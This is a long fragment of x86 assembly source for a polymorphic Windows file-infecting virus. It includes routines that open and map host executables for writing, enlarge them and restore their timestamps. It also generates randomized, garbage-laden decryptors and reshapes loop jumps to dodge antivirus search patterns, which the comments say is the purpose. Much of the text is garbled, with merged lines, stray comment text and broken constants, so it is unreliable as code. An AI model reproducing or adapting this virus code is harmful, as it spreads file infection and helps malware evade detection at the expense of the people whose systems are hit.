Push DWORD PTR [EAX EBX]

POP EAX

MOV EDX, DWORD PTR [EBP Importsh]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

Found_Place:; use this point? or better Continue the Search?

Call get_rnd_range

Test Eax, 01H

JZ ERR_API_CALL

POP EAX

MOV ECX, ESI

Dec ECX

SUB ECX, EBX

RET

TRY_MICROSOFT: CMP BYTE PTR [ESI], 15h

JNE ERR_API_CALL

Mov Eax, DWORD PTR [ESI 00000001H]

SUB EAX, DWORD PTR [EBP HOST_BASE]

MOV EDX, DWORD PTR [EBP Importsh]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

SUB EAX, DWORD PTR [EDX SH_VIRTUALADDRESS]

Add Eax, DWORD PTR [EDX Sh_POINTERTORAWDATA]

Push DWORD PTR [EAX EBX]

POP EAX

; If File Is Binded Eax Contains The Address of The API

Leets CHECK IF EAX POINTS TO A KERNEL32 API

CMP EAX, DWORD PTR [EBP K32CODESTART]

JB INSIDE_IMPORT

CMP EAX, DWORD PTR [EBP K32CODEEND]

JB Found_Place

INSIDE_IMPORT: MOV EDX, DWORD PTR [EBP IMPORTSH]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

JMP Found_Place

; ================================================== ===========================; seh handling routines code by jacky qWERTY / 29A

; ================================================== ===========================

SEH_FRAME: SUB EDX, EDX

Push DWORD PTR FS: [EDX]

MOV FS: [EDX], ESP

JMP [ESP. (02H * pshd) .retaddr]

SEH_REMOVEFRAME: Push 00000000H

POP EDX

Pop DWORD PTR [ESP. (02H * pshd) .retaddr]

POP DWORD PTR FS: [EDX]

POP EDX

RET (PSHD)

SEH_SETUPFRAME: CALL SEH_FRAME

Mov Eax, [ESP.EH_EXCEPTIONRECORD]

TEST BYTE PTR [EAX.ER_EXCEPTIONFLAGS], /

EH_UNWINDING OR EH_EXIT_UNWIND

MOV EAX, DWORD PTR [EAX.ER_EXCEPTIONCODE]

Jnz SEH_SEARCH

Add eax, -exception_access_violation

Jnz SEH_SEARCH

MOV ESP, DWORD PTR [ESP.EH_ESTABLISHERFRAME]

MOV DWORD PTR FS: [EAX], ESP

JMP DWORD PTR [ESP. (02H * pshd) .arg1]

SEH_SEARCH: XOR EAX, EAX

RET

; ================================================== ===========================; Filemapro Open and map a file for read-only access

;

On Entry:

BUFSTRFILENAME -> Buffer Filled with Path FileName

EXIT:

EAX -> Base Address of Memory Map for File or Null IF Error

; ================================================== ===========================

; ================================================== ===========

GetfileAttributes

; ================================================== ===========

Filemapro: LEA ESI, DWORD PTR [EBP BUFSTRFILENAME]

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_GETFILEATTRIBUTESA]

CMP EAX, 0FFFFFFFH

JNE FileGetattrokfilegettractrer: xor Eax, EAX

RET

; ================================================== ===========

Createfile (generic_read)

; ================================================== ===========

Filegettrok: MOV DWORD PTR [EBP CURFileAtTR], EAX

XOR EDI, EDI

Push EDI; HTEMPLATEFILE

Push file_attribute_normal; dwflagsandattributes

Push Open_EXISTING; DWCREATIONDisPosition

Push EDI; LPSecurityAttributes

Push EDI; DWSHAREMODE

Push generic_read; dwdesiredAccess

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_CREATEFILEA]

CMP EAX, INVALID_HANDLE_VALUE

Je Filegettrerrrrrrrrrrrr

; ================================================== ===========

CREATEFILEMAPPING (Page_Readonly)

; ================================================== ===========

MOV DWORD PTR [EBP H_CREATEFILE], EAXPUSH EDI; LPNAME

Push EDI; DWMAXIMUMSIZELOW

Push EDI; DWMAXIMUMSIZEHIGH

Push Page_readonly; flprotect

Push EDI; LPFILEMAPPINGATTRIBUTES

Push DWORD PTR [EBP H_CREATEFILE]; HFILE

Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]

OR EAX, EAX

Jnz Okfilemappingro

Errfilemapro: Push DWORD PTR [EBP H_CREATEFILE]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP Filegettrerr

; ================================================== ===========

MappViewoffile

; ================================================== ===========

Okfilemappingro: MOV DWORD PTR [EBP H_FILEMAP], EAX

Push EDI; DWNUMBEROFBYTOMAP

Push EDI; DWFILEOFFSETLOW

Push EDI; DWFILEOFFSETHIGH

Push file_map_read; dwdesiredAccess

Push Eax; HfileMappingObject

Call DWORD PTR [EBP A_MAPVIEWOFFILE]

OR EAX, EAX

Jnz FileViewokro

FileViewError: Push DWORD PTR [EBP H_FILEMAP]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP Errfilemapro

; ================================================== ===========

Ready!; ============================================== ==============

FileViewokro: MOV DWORD PTR [EBP MAP_IS_HERE], EAX

RET

; ================================================== ===========

Unmapro

; ================================================== ===========

Fileunmapro: Push EBX

Call DWORD PTR [EBP A_UNMAPVIEWOFFILE]

JMP FileViewErrorro

; ================================================== ===========================

Filemaprw Open and Map A File for Read and Write Access

;

On Entry:

BUFSTRFILENAME -> Buffer Filled with Path FileName

EXIT:

EAX -> Base Address of Memory Map for File or Null IF Error

; ================================================== ===========================; ===================================================================================================================================================== =======================================

Calculate size of infread file

; ================================================== ===========

Filemaprw: MOV Eax, DWORD PTR [EBP VIR_OFFSET]

Add Eax, (SIZE_VIRTUAL * 02H) /

(Number_of_Poly_Layers * 00004000H)

MOV ECX, SIZE_PADDING

XOR EDX, EDX

Div ECX

INC EAX

Mul ECX

Mov DWORD PTR [EBP FATSIZE], EAX

; ================================================== ===========

SetFileAttributes

; ================================================== =========== LEA ESI, DWORD PTR [EBP BUFSTRFILENAME]

Push file_attribute_normal; dwfileAttributes

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]

OR EAX, EAX

JNZ FileSetattrok

FileSetattrer: xor Eax, EAX

RET

; ================================================== ===========

Createfile (generic_read or generic_write)

; ================================================== ===========

FileSetattrok: xor Edi, EDI

MOV DWORD PTR [EBP MAP_IS_HERE], EDI

Push EDI; HTEMPLATEFILE

Push file_attribute_normal; dwflagsandattributes

Push Open_EXISTING; DWCREATIONDisPosition

Push EDI; LPSecurityAttributes

Push EDI; DWSHAREMODE

Push generic_read or generic_write; dwdesiredAccess

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_CREATEFILEA]

CMP EAX, INVALID_HANDLE_VALUE

JNE FileOpenokrw

FileopenerrorRrw: Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]; Need for Reverse!

Push DWORD PTR [EBP CURFileAttr]; DWFileAttributes

Push ESI; LPFILENAME

Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]

JMP FileSetattrerr

; ================================================== ===========

CREATEFILEMAPPING (Page_Readwrite)

; ================================================== ===========

FileOpenokrw: MOV DWORD PTR [EBP H_CREATEFILE], EAX

Push EDI; LPNAME

Push DWORD PTR [EBP FATSIZE]; DWMAXIMUMSIZELOW

Push EDI; DWMAXIMUMSIZEHIGH

Push Page_Readwrite; flprotect

Push EDI; LPFILEMAPPINGATTRIBUTES

Push eax; hfile

Call DWORD PTR [EBP A_CREATEFILEMAPPINGA]

OR EAX, EAX

JNZ Filemapokrw

FilemaperrorRrw: CMP DWORD PTR [EBP MAP_IS_HERE], EDI

JZ FileSizeisok

MOV ESI, DWORD PTR [EBP H_CREATEFILE]

XOR EAX, EAX

Push Eax; DWMoveMethod

Push Eax; LPDistanceTomovehigh

Push DWORD PTR [EBP FATSIZE]; LDISTANCETOMOVE

Push ESI; HFILE

Call DWORD PTR [EBP A_SETFILEPOINTER]

CMP EAX, 0FFFFFFFH

Je FileSizeisok

Push ESI; HFILE

Call DWORD PTR [EBP A_SETENDOFFILE]

Lea Edx, DWORD PTR [EBP FT_LASTWRITIME]

Push Edx

Sub EDX, 00000008H

Push Edx

Sub EDX, 00000008H

Push Edx

PUSH ESI

Call DWORD PTR [EBP A_SETFILETIME]

FileSizeisok: Push DWORD PTR [EBP H_CREATEFILE]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP FileOpenerrorRrw

; ================================================== ===========; MapViewOffile

; ================================================== ===========

Filemapokrw: MOV DWORD PTR [EBP H_FILEMAP], EAX

Push DWORD PTR [EBP FATSIZE]; DWNUMBEROFBYTOMAP

Push EDI; DWFILEOFFSETLOW

Push EDI; DWFILEOFFSETHIGH

Push file_map_write; dwdesiredAccess

Push Eax; HfileMappingObject

Call DWORD PTR [EBP A_MAPVIEWOFFILE]

OR EAX, EAX

JNZ FileViewokrw

FileViewErrorRrw: Push DWORD PTR [EBP H_FILEMAP]

Call DWORD PTR [EBP A_CLOSEHANDLE]

JMP FilemaPerrorRW

FileViewokrw: MOV DWORD PTR [EBP MAP_IS_HERE], EAX

RET

; ================================================== ===========

Unmaprw

; ================================================== ===========

Fileunmaprw: Push EBX

Call DWORD PTR [EBP A_UNMAPVIEWOFFILE] JMP FileViewErrorrw

; ================================================== ===========================

Convert RVA TO RAW

;

On Entry:

EBX -> Host Base Address

; EDX -> RVA TO Convert

ON EXIT:

; ECX -> Pointer to Raw Data or Null IF Error

; EDX -> Section Delta Offset

ESI -> Pointer to Image_Optional_Header

EDI -> Pointer to Section Header

; ================================================== ===========================

RVA2RAW: CLD

MOV DWORD PTR [EBP Search_RAW], EDX

MOV ESI, DWORD PTR [EBX MZ_LFANEW]

Add ESI, EBX

Lodsd

Movzx ECX, Word PTR [ESI FH_NUMBEROFSECTIONS]

JECXZ ERR_RVA2RAW

Movzx EDI, Word PTR [ESI FH_SIZEOFOPTIONALHEADER]

Add ESI, Image_SizeOf_file_header

Add Edi, ESI

; ================================================== ===========

Get the image_section_header That Contains RVA

;

; At this point :;

EBX -> File Base Address

ESI -> Pointer to Image_Optional_Header

EDI -> Pointer to First Section Header

ECX -> Number of Sections

;

Check if address of imports directory is inside THIS DIRECTORY IS INSIDE

; section

; ================================================== ===========

S_IMG_SECTION: MOV EAX, DWORD PTR [EBP Search_RAW]

MOV EDX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

Sub Eax, EDX

CMP EAX, DWORD PTR [EDI SH_VIRTUALSIZE]

JB Section_ok

; ================================================== ===========

Go to Next Section Header

; ================================================== ===========

OUT_OF_SECTION: Add Edi, Image_SizeOf_SECTION_HEADER

Loop S_IMG_SECTION

ERR_RVA2RAW: RET

; ================================================== ===========

Get Raw

; ================================================== ===========

Section_ok: MOV ECX, DWORD PTR [EDI SH_POINTERTORAWDATA]

Sub EDX, ECX

Add ECX, EAX

Add ECX, EBX

RET

; ================================================== ===========================

Get code section header and entry-point information

;

On Entry:

EBX -> Host Base Address

ON EXIT:

; ECX -> Pointer to Raw Data or Null IF Error

EDX -> Entry-Point RVA

ESI -> Pointer to Image_Optional_Header

EDI -> Pointer to Section Header

; ================================================== ===========================

GET_CODE_SH: CALL GET_LAST_SH

MOV EDX, DWORD PTR [ESI OH_ADDRESSOFENTRYPOINT]

Push Edx

Call Rva2Raw

POP EDX

RET

; ================================================== ============================ g Pointer to Last Section Header

;

On Entry:

EBX -> Host Base Address

ON EXIT:

ESI -> Image_Optional_Header

EDI -> Pointer to Last Section Header

; ================================================== ===========================

GET_LAST_SH: PUSH ECX

MOV ESI, DWORD PTR [EBX MZ_LFANEW]

Add ESI, EBX

CLD

Lodsd

Movzx ECX, Word PTR [ESI FH_NUMBEROFSECTIONS]

Dec ECX

MOV EAX, Image_SizeOf_section_Header

Mul ECX

Movzx EDX, Word Ptr [ESI FH_SIZEOFOPTIONALHEADER]

Add ESI, Image_SizeOf_file_header

Add Eax, EDX

Add Eax, ESI

Mov Edi, EAX

POP ECX

RET

; ================================================== ===========================

Generate Data Area Suitable for Memory Write Access

;

EDI -> Base Address

ECX -> size; ============================================ =======================================================================================================================================================

Gen_data_area: Push Eax

Push Edx

Movzx Eax, Byte PTR [EBP NumberofDataareas]]

CMP EAX, NUM_DA

JAE NO_MORE_DA

Lea EDX, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]

Mov Eax, EDI

SUB EAX, DWORD PTR [EBP MAP_IS_HERE]

Add Eax, DWORD PTR [EBP HOST_BASE]

Push ECX

MOV ECX, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [ECX SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [ECX SH_VIRTUALADDRESS]

Mov DWORD PTR [EDX], EAX

POP ECX

MOV DWORD PTR [EDX 00000004h], ECX

Inc Byte PTR [EBP NumberofDataareas]]

NO_MORE_DA: POP EDX

POP EAX

RET

; ================================================== ===========================

Generate a Block of Random Data

; ================================================== =========================== gEN_RND_BLOCK: MOV EAX, 0000000AH

MOV ECX, EAX

Call get_rnd_range

Add ECX, EAX

Call Gen_Data_Area

RND_FILL: MOV EAX, DWORD PTR [EBP FileSizeOnDisk]

Dec EAX

Sub Eax, ECX

Call get_rnd_range

Add Eax, DWORD PTR [EBP MAP_IS_HERE]

Mov ESI, EAX

CLD

REP MOVSB

RET

; ================================================== ===========================

LINEAR CONGRUENT PSEUDORAndom Number Generator

; ================================================== ===========================

GET_RND32: PUSH ECX

Push Edx

MOV EAX, DWORD PTR [EBP RND32_SEED]

MOV ECX, 41C64E6DH

Mul ECX

Add eax, 00003039H

And Eax, 7FFFFFFH

MOV DWORD PTR [EBP RND32_SEED], EAX

POP EDX

POP ECX

RET

; ================================================== ===========================; returns a Random Num Between 0 and Entry EAX

; ================================================== ===========================

GET_RND_RANGE: PUSH ECX

Push Edx

MOV ECX, EAX

Call get_rnd32

XOR EDX, EDX

Div ECX

MOV EAX, EDX

POP EDX

POP ECX

RET

; ================================================== ===========================

; Perform Encryption

; ================================================== ===========================

; ================================================== ============; this buffer will contact the code to "crypt" the Virus Code

FOLLOWED by a return instruction

; ================================================== ===========

Perform_crypt: DB 10h DUP (90h)

; ================================================== ===========================

Generate Decryptor Action: loading Pointer

;

WE DONT NEED TO GET DELTA-OFFSET, this Virus AssuMes Fixed Load Address

; ================================================== ===========================

Gen_load_ptr: MOV Al, 0B8H

OR Al, Byte PTR [EBP INDEX_MASK]

Stosb

MOV EAX, DWORD PTR [EBP HOST_BASE]

Add Eax, DWORD PTR [EBP PTRTOCRYPT] Add Eax, DWORD PTR [EBP PTR_DISP]

MOV EDX, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]

TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_DIRECTION

JZ FIX_DIR_OK

Push Eax; FIX UPON DIRECTION

Call fixed_size2ecx

XOR EAX, EAX

MOV Al, Byte PTR [EBP OPER_SIZE]

Push EAX

Mul ECX

POP ECX

Sub Eax, ECX

POP ECX

Add Eax, ECX

FIX_DIR_OK: StOSD

RET

; ================================================== ===========================

; Generate Decryptor Action: loading counter

; ================================================== ===========================

; ================================================== ===========

Easy Now, Just Move Counter Random Initial Value

; INTO Counter REG AND CALCULATE The End Value

; ================================================== =========== GEN_LOAD_CTR: MOV Al, 0B8H

OR Al, Byte PTR [EBP Counter_mask]

Stosb

Call fixed_size2ecx

Call get_rnd32

Stosd

TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_CDIR

JNZ Counter_Down

Counter_up: Add Eax, ECX

JMP Short Done_ctr_dir

Counter_Down: Sub Eax, ECX

DONE_CTR_DIR: MOV DWORD PTR [EBP END_VALUE], EAX

RET

; ================================================== ===========================

; Generate Decryptor Action: Decrypt

; ================================================== ===========================

Gen_Decrypt: MOV Eax, DWORD PTR [EBP PTR_DISP]

MOV DWORD PTR [EBP FAKE_PTR_DISP], EAX

MOV EAX, DWORD PTR [EBP CRYPT_KEY]

MOV DWORD PTR [EBP FAKE_CRYPT_KEY], EAX

MOV Al, Byte PTR [EBP Build_Flags]

MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al

MOV Al, Byte PTR [EBP OPER_SIZE]

MOV BYTE PTR [EBP FAKE_OPER_SIZE], Almov Al, Byte PTR [EBP INDEX_MASK]

MOV BYTE PTR [EBP FAKE_INDEX_MASK], Al

Call fake_or_not

XOR EAX, EAX

MOV Al, Byte PTR [EBP OPER_SIZE]

SHR EAX, 01H

SHL EAX, 02H

Add ESI, ESI

Lodsd

Add Eax, EBP

Mov ESI, EAX

Push EDI

Lea EDI, DWORD PTR [EBP Perform_Crypt]

LOOP_STRING: LODSB

CMP Al, Magic_ENDSTR

JE END_OF_MAGIC

CMP Al, Magic_ENDKEY

JE Last_SPell

XOR ECX, ECX

MOV CL, Al

REP MOVSB

JMP Short loop_string

Last_spell: Call Copy_Key

END_OF_MAGIC: MOV Al, 0C3H

Stosb

POP EDI

RET

; ================================================== ===========================

Copy Encryption Key Into Work Buffer Taking Care About Operand Size

; ================================================== ===========================

Copy_Key: MOV Eax, DWORD PTR [EBP FAKE_CRYPT_KEY]

Movzx ECX, Byte Ptr [EBP FAKE_OPER_SIZE]

LOOP_KEY: Stosb

SHR EAX, 08H

Loop loop_key

RET

; ================================================== ===========================; Generate Decryptor Action: Move Index to Next Step

; ================================================== ===========================

; ================================================== ===========

Get Number of Bytes to incor Dec the index REG

; ================================================== ===========

GEN_NEXT_STEP: MOVZX ECX, Byte Ptr [EBP OPER_SIZE]

; ================================================== ===========; Get Number of Bytes to Update with this Instruction

; ================================================== ===========

LOOP_UPDATE: MOV EAX, ECX

Call get_rnd_range

INC EAX

; ================================================== ===========

Check Direction

; ================================================== ===========

TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_DIRECTION

JNZ Step_Down

Call do_step_up

JMP Short Next_UPDATE

Step_down: Call do_step_down

Next_UPDATE: SUB ECX, EAX

Call Gengarbageex

JECXZ END_UPDATE

JMP Short loop_update

END_UPDATE: RET

; ================================================== ===========; Move Index_REG UP

; ================================================== ===========

Do_step_up: push eax

Mov Eax, NumidXup

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_IDX_UP EAX * 04H]

Lodsd

Add Eax, EBP

JMP EAX

IDXUPWITHADD: MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

Stosd

RET

IDXUPWITHSUB: MOV AX, 0E881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

NEG EAX

Stosd

NEG EAX

RET

IDXUPWITHINC: MOV Al, 40h

OR Al, Byte PTR [EBP INDEX_MASK]

Stosb

POP EAX

MOV EAX, 000000001H

RET

IDXUPADDADD: CALL SAVE_IT_ADD

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXUPADDSUB: CALL SAVE_IT_ADD

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

Stosd

MOV EAX, EDX

RET

IDXUPSUBSUB: CALL SAVE_IT_SUB

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXUPSUBADD: CALL SAVE_IT_SUB

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

Stosd

MOV EAX, EDX

RET

; ================================================== ===========; Move Index_Reg Down

; ================================================== ===========

Do_step_down: push eax

Mov Eax, NumIDXDown

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBL_IDX_DOWN EAX * 04H]

Lodsd

Add Eax, EBP

JMP EAX

IDXDownwithadd: MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

NEG EAX

Stosd

NEG EAX

RET

IDXDownwithsub: MOV AX, 0E881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

Stosd

RET

IDXDownwithDec: Mov Al, 48h

OR Al, Byte PTR [EBP INDEX_MASK]

Stosb

POP EAX

MOV EAX, 00000001H

RET

IDXDOWNADDADD: CALL SAVE_IT_ADD

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXDOWNADDSUB: CALL SAVE_IT_ADD

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Sub Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXDOWNSUBSUB: CALL SAVE_IT_SUB

Push EAX

Mov AX, 0e881H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

IDXDOWNSUBADD: CALL SAVE_IT_SUB

Push EAX

MOV AX, 0C081H

OR AH, BYTE PTR [EBP INDEX_MASK]

Stosw

POP EAX

POP EDX

Add Eax, EDX

NEG EAX

Stosd

MOV EAX, EDX

RET

SAVE_IT_ADD: CALL TOTAL_SAVE_IT

Push Edx

MOV Al, 03H

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call Gengarbageex

POP EAX

RET

Save_it_sub: Call Total_save_it

Push Edx

MOV Al, 2BH

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

Call Gengarbageex

POP EAX

RET

Total_save_it: Call get_valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV Al, 0B8H

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Call get_rnd32

Stosd

Push EAX

Push EBX

Call Gengarbageex

POP EBX

MOV AH, BYTE PTR [EBP INDEX_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EBX REG_MASK]

OR AH, 0C0H

POP EDX

RET

; ================================================== ===========================

Generate Decryptor Action: Next Counter Value

; ================================================== ===========================

; ================================================== ===========

Check counter direction and update counter; using a incor Dec Instruction

; ================================================== ===========

GEN_NEXT_CTR: TEST BYTE PTR [EBP BUILD_FLAGS], CRYPT_CDIR

JNZ UPD_CTR_DOWN

UPD_CTR_UP: CALL GET_RND32

And Al, 01H

JZ Countupinc

MOV Al, 40h

JMP doshitwithctr

Countupinc: MOV Al, 40h

OR Al, Byte PTR [EBP Counter_mask]

JMP short Upd_ctr_ok

UPD_CTR_DOWN: CALL GET_RND32

And Al, 01H

JZ CountuPDEC

MOV Al, 48h

JMP doshitwithctr

CountuPDEC: MOV Al, 48h

OR Al, Byte PTR [EBP Counter_mask]

UPD_CTR_OK: Stosb

RET

Doshitwithctr: Push EAX

Call Get_Valid_reg

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

MOV AH, BYTE PTR [EBX REG_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EBP Counter_Mask]

OR AH, 0C0H

MOV Al, 8BH

Stosw

Push EBX

Call Gengarbageex

POP EBX

POP EAX

OR Al, Byte PTR [EBX REG_MASK]

Stosb

Push EBX

Call Gengarbageex

POP EBX

MOV AH, BYTE PTR [EBP Counter_Mask]

SHL AH, 03H

OR AH, BYTE PTR [EBX REG_MASK]

OR AH, 0C0H

MOV Al, 8BH

Stosw

XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

RET

; ================================================== ===========================

Generate Decryptor Action: loop

; ================================================== ===========================; ===================================================================================================================================================== =======================================

Use Counter REG IN CMP INSTRUCTION?

; ================================================== ===========

Gen_Loop: Test Byte Ptr [EBP Build_Flags], Crypt_cmpctr

Jnz Doloopauxreg

; ================================================== ===========

Generate Cmp Counter_reg, End_Value

; ================================================== ===========

MOV AX, 0F881hor AH, BYTE PTR [EBP Counter_Mask]

Stosw

MOV EAX, DWORD PTR [EBP END_VALUE]

Stosd

JMP DOLOOPREADY

; ================================================== ===========

; Get a Random Valid Register To Use in A CMP Instruction

; ================================================== ===========

DOLOOPAUXREG: CALL GET_VALID_REG

Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY

; ================================================== ===========

Move Index Reg Value INTO AUX REG

; ================================================== ===========

MOV AH, BYTE PTR [EBX REG_MASK]

SHL AH, 03H

OR AH, BYTE PTR [EBP Counter_Mask]

OR AH, 0C0H

MOV Al, 8BH

Stosw

; ================================================== ===========; guess what !?

; ================================================== ===========

Push EBX

Call Gengarbageex

POP EBX

Call get_rnd32

And Al, 03H

OR Al, Al

JZ loop_use_cmp

Test Al, 02h

JZ loop_use_sub

; ================================================== ===========

Generate Add Aux_reg, -end_value

; ================================================== ===========

LOOP_USE_ADD: MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

MOV EAX, DWORD PTR [EBP END_VALUE]

NEG EAX

Stosd

JMP Short Done_loop_use

; ================================================== ===========; Generate Cmp Aux_reg, End_Value

; ================================================== ===========

LOOP_USE_CMP: MOV AX, 0F881H

JMP Short loop_mask_here

; ================================================== ===========

Generate Sub Aux_reg, End_Value

; ================================================== ===========

LOOP_USE_SUB: MOV EAX, 0e881H

LOOP_MASK_HERE: OR AH, BYTE PTR [EBX REG_MASK]

Stosw

MOV EAX, DWORD PTR [EBP END_VALUE]

Stosd

; ================================================== ===========; Restore Aux Reg State

; ================================================== ===========

DONE_LOOP_USE: XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY

; ================================================== ===========

Genere Conditional Jump

; ================================================== ===========

DoloopReady: Mov Eax, NumexitLoop

Call get_rnd_range

Lea ESI, DWORD PTR [EBP TBLEXITLOOP EAX * 04H]

Lodsd

Add Eax, EBP

JMP EAX

TbleXitLoop EQU $

DD Offset DOLOOPUP

DD Offset Doloopdown

DD Offset Doloopmix

NumexitLoop EQU ($ -TblexitLoop) / 04H

; ================================================== ===========; Generate The FOLLOWING STRUCTURE:

;

Loop_point:

; ...

JNZ loop_point

; ...

JMP Decrypted-Code

; ================================================== ===========

DOLOOPUP: MOV DWORD PTR [EBP CONDition_PTR], EDI

MOV AX, 850FH

Stosw

MOV EAX, DWORD PTR [EBP LOOP_POINT]

Sub Eax, EDI

Sub Eax, 00000004H

Stosd

Call Gengarbageex

MOV ESI, DWORD PTR [EBP PTRTOEP]

Call docomplexcmp

JMP Createfog

; ================================================== ===========

; ... or this one:

;

Loop_point:

; ...

JZ Decrypted-Code

; ...

; jmp loop_point

; ...

; ================================================== ===========

DOLOOPDOWN: MOV DWORD PTR [EBP CONDition_PTR], EDI

MOV AX, 840FH

Stosw

MOV EAX, DWORD PTR [EBP PTRTOEP] SUB EAX, EDI

Sub Eax, 00000004H

Stosd

Call Gengarbageex

MOV ESI, DWORD PTR [EBP LOOP_POINT]

Call docomplexcmp

JMP Createfog

; ================================================== ===========

Generate The Following Structure:

;

Loop_point:

; ...

JNZ auxdest

; ...

JMP Decrypted-Code

; ...

; AUXDEST:

; ...

; jmp loop_point

; ================================================== ===========

DOLOOPMIX: MOV DWORD PTR [EBP CONDition_PTR], EDI

MOV AX, 850FH

Stosw

Push EDI

Stosd

Call Gengarbageex

MOV ESI, DWORD PTR [EBP PTRTOEP]

Call docomplexcmp

Call Gengarbageex

POP EDX

Mov Eax, EDI

Sub Eax, 00000004H

Sub Eax, EDX

Mov DWORD PTR [EDX], EAX

Call Gengarbageex

MOV ESI, DWORD PTR [EBP LOOP_POINT]

Call docomplexcmp

; ================================================== ===========

I Notice Some av WAS Using the JZ / JNZ Instruction At the JZ / JNZ INSTRUCTION

; End of the decryptor in a search pattern ... so now im Going

To build it at runtime (sometimes ...)

; ================================================== =========== Createfog: test byte ptr [EBP Build_Flags], Crypt_fog

JZ Nofogret

Mov Eax, Numfog

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBLDOFOG EAX * 04H]

Lodsd

Add Eax, EBP

Call EAX

MOV EAX, Numfixfog

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBLFIXFOG EAX * 04H]

Lodsd

MOV ESI, DWORD PTR [EBP CONDition_ptr]

Add Eax, EBP

Call EAX

Nofogret: Ret

; ================================================== ===========================

Prepare Pointer to Memory Into Fog Block, Using Add

; ================================================== ===========================

DofogAdd: Call Fogstart

SUB EAX, DWORD PTR [EBP XRND1]

Push EDI

Push EAX

MOV EBX, DWORD PTR [EBP XRNDREG]

MOV EDI, DWORD PTR [EBP XRNDFIXPTR]

MOV AX, 0C081H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

POP EAX

Stosd

POP EDI

RET

FixfogAdd: Push Edi

MOV EDI, DWORD PTR [EBP XRNDMATH]

MOV Al, 81H

MOV AH, BYTE PTR [EBX REG_MASK]

Stosw

Call get_rnd32

Stosd

Sub DWORD PTR [ESI], EAX

POP EDI

RET

; ================================================== ===========================

Prepare Pointer To Memory Into Fog Block, Using Sub

; ================================================== ===========================

DOFOGSUB: Call FogStart

NEG EAX

Add Eax, DWORD PTR [EBP XRND1]

Push EDI

Push EAX

MOV EBX, DWORD PTR [EBP XRNDREG]

MOV EDI, DWORD PTR [EBP XRNDFIXPTR]

Mov AX, 0e881H

OR AH, BYTE PTR [EBX REG_MASK]

Stosw

POP EAX

Stosd

POP EDI

RET

FIXFOGSUB: PUSH EDI

MOV EDI, DWORD PTR [EBP XRNDMATH]

MOV AX, 2881H

OR AH, BYTE PTR [EBX REG_MASK]

